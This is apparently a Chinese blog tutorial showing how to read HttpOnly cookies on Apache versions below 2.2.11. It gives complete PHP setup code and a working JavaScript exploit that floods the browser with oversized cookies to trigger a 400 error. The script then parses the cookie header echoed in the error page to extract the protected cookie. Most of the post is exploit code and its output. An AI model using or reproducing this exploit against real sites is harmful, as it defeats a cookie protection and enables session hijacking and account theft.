标签归档:httponly

获取HttpOnly cookie方法(限Apache2.2.11以下版本)

首先建立个页面为test.php,为该页面设置2个 cookie值,代码如下:

<?php
setcookie("open",1,time()+3600,"","",0);  //一般的COOKIE
setcookie("private",1,time()+3600,"","",0,1);  //设置为HTTPONLY COOKIE
?>

接着我在test.php页面里面插入JS代码alert(document.cookie);看是否能查看到2个cookie的值。结果为open=1

接下来我们的目标就是获取到httponly的cookie,接下来我们创建一个ajax.js文件,文件代码如下:(JS代码来自于https://gist.github.com/pilate/1955a1c28324d4724b7b/)

// Most browsers limit cookies to 4k characters, so we need multiple
function setCookies (good) {
// Construct string for cookie value
var str = "";
for (var i=0; i< 819; i++) {
str += "x";
}
// Set cookies
for (i = 0; i < 10; i++) {
// Expire evil cookie
if (good) {
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Set evil cookie
else {
var cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
}
 
function makeRequest() {
setCookies();
 
function parseCookies () {
var cookie_dict = {};
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies[i].split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
}
// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "test.php", true);  //请求当前目录下的test.php文件 
xhr.send(null);
}
 
makeRequest();

然后在修改下test.php代码文件

<?php
setcookie("open",1,time()+3600,"","",0);
setcookie("private",1,time()+3600,"","",0,1);
 
?>
 
<script src="ajax.js"></script>
 
<body onload="makeRequest();">

接着就访问test.php文件即可访问到
open=1;private=1